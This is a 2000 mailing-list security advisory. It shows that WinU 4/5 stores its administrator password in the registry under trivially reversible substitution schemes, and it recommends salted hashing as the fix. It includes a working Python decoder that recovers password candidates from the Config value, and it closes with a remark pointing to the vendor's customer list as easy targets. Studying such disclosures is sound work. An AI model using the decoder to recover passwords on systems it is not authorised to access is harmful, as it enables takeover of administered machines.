Subject: WinU 4/5 weak password vulnerability
From: Nu Omega Tau (nu_omega_tauALTAVISTA.COM)
Date: Wed Aug 16 2000 - 13:48:33 CDT


****************************************
* WINU 4/5 weak password vulnerability *
****************************************

WinU 4/5 stores its administrator password under a trivially reversible, keyless substitution scheme, which leads to possible WinU administrator compromise.

Introduction
============
As we all know, Windows 9x is an OS without any (good/local) security. WinU (http://www.bardon.com) is one of the many programs trying to change this and, in my opinion, has done the best job so far. But some things can still be improved, such as the password encryption...

Encryption - Version 4.X-5.0
============================
Up to version 5.0 the following password "encryption" algorithm is used (it is a fixed-offset substitution with no key at all, so anyone who knows the constant can reverse it):
154 - asciicode_of_character = encrypted_asciicode_of_character
In other words, for the letter "A" (ASCII 65) the formula gives
154 - 65 = 89
or
154 - ASCII(A) = ASCII(Y)
So the word WinU (ASCII 87, 105, 110, 85) encrypts to: C1,E (ASCII 67, 49, 44, 69)
The encrypted string is then reversed (E,1C) to confuse a password cracker.
The encrypted password is then stored in the Windows registry:
HKEY_CLASSES_ROOT\WinU4\Config or HKEY_CLASSES_ROOT\WinU5\Config
The other program settings are stored in the same key, but the encrypted password sits somewhere near the beginning of the value. If the password is a dictionary word you will be able to recognise it simply by applying the decryption formula to the entire value and looking for a readable run of characters (remembering that it is stored reversed).

Encryption - Version 5.1
========================
Well... Bardon "fixed" it in version 5.1. Instead of the
154 - asciicode_of_character = encrypted_asciicode_of_character formula,
the following formula is used now:
asciicode_of_character + 101 = encrypted_asciicode_of_character
For "WinU" this gives the bytes 188, 206, 211, 186: no longer printable ASCII, but a constant offset is reversed just as easily by subtracting 101.

This only protects against attacks with a canned tool (like the infamous WinU4 hacker utilities). A more advanced and/or determined cracker will look for the new constant, and with a description of the 4.x-5.0 algorithm as a starting point will be able to crack it within minutes.
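The following script is an added example (not part of the original advisory and not Bardon's code) that implements both substitution schemes described above, for the 4.x-5.0 case including the string reversal, and shows the "decrypt the whole value and look for a readable run" approach for locating the password inside the Config value. The registry blobs below are constructed sample data, not real WinU Config contents; the function names and the minimum run length are my own choices, and on a real Windows 9x box you would read the value from HKEY_CLASSES_ROOT\WinU4\Config or HKEY_CLASSES_ROOT\WinU5\Config yourself.

```python
"""Encode/decode the WinU 4.x-5.0 and 5.1 password obfuscation schemes.

Added example; the constants 154 and 101 come from the advisory,
everything else (names, sample data) is assumed for illustration.
"""

SUB_CONST = 154   # WinU 4.x / 5.0: stored = 154 - ord(c), whole string then reversed
ADD_CONST = 101   # WinU 5.1:       stored = ord(c) + 101 (no reversal described)


def encode_v4(password: str) -> bytes:
    """WinU 4.x-5.0 scheme: per-character 154 - ASCII, then reverse the result."""
    return bytes(SUB_CONST - ord(c) for c in password)[::-1]


def decode_v4(stored: bytes) -> str:
    """Undo the reversal, then 154 - byte recovers each plaintext character."""
    return "".join(chr(SUB_CONST - b) for b in stored[::-1])


def encode_v51(password: str) -> bytes:
    """WinU 5.1 scheme: per-character ASCII + 101 (yields bytes above 127)."""
    return bytes(ord(c) + ADD_CONST for c in password)


def decode_v51(stored: bytes) -> str:
    """Subtracting the constant recovers each plaintext character."""
    return "".join(chr(b - ADD_CONST) for b in stored)


def _printable_runs(decoded: list, min_len: int) -> list:
    """Collect runs of at least min_len printable ASCII characters; None breaks a run."""
    runs, cur = [], []
    for ch in decoded:
        if ch is not None and 32 <= ord(ch) <= 126:
            cur.append(ch)
        else:
            if len(cur) >= min_len:
                runs.append("".join(cur))
            cur = []
    if len(cur) >= min_len:
        runs.append("".join(cur))
    return runs


def candidates(blob: bytes, scheme: str, min_len: int = 4) -> list:
    """Apply the per-byte decode to a whole Config value and return readable runs.

    For "v4" each run is reversed back, because the password was stored reversed.
    Other settings in the value may also decode to printable junk, so the result
    is a candidate list, not a single answer.
    """
    if scheme == "v4":
        decoded = [chr(SUB_CONST - b) if b <= SUB_CONST else None for b in blob]
        return [run[::-1] for run in _printable_runs(decoded, min_len)]
    if scheme == "v51":
        decoded = [chr(b - ADD_CONST) if b >= ADD_CONST else None for b in blob]
        return _printable_runs(decoded, min_len)
    raise ValueError("unknown scheme: " + scheme)


# Constructed sample Config values: a few bytes of "other settings" around the
# obfuscated password "oliebollen" (from the advisory's conclusion).
SAMPLE_V4 = b"\x05\x00" + encode_v4("oliebollen") + b"\x00\x01\xa0\x9a"
SAMPLE_V51 = b"\x05\x00" + encode_v51("oliebollen") + b"\x00\x64"


if __name__ == "__main__":
    print("WinU  -> v4 stored :", encode_v4("WinU"))        # b'E,1C'
    print("WinU  -> v5.1 stored:", list(encode_v51("WinU")))
    print("v4 candidates  :", candidates(SAMPLE_V4, "v4"))
    print("v5.1 candidates:", candidates(SAMPLE_V51, "v51"))
```

The point the scanner makes is that neither scheme needs a key or a "cracker": a single subtraction per byte turns the registry value back into text, and the only work left is picking the readable run out of the surrounding settings.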

Other versions
==============
Versions earlier than 4.0 probably use the 4.x algorithm or an even weaker scheme.
I wasn't able to get version 5.02; it probably uses the 5.1 algorithm, because it was released after I made the algorithm public.

Possible fix
============
Store the password under a one-way (non-reversible) function, i.e. a salted password hash, and compare hashes at login. A reversible cipher such as DES does not help by itself, since the program must carry the key and anyone who can read the registry can read the program too; and a slightly more complicated "+ this or - that" formula is no better than the current one.

Conclusion
==========
This vulnerability makes WinU very insecure: lots of computer networks using WinU can easily be taken over, especially if they've got an easy-to-recognise password like "oliebollen" or something.
Check out www.bardon.com for a list of WinU users... wow!...shit :)
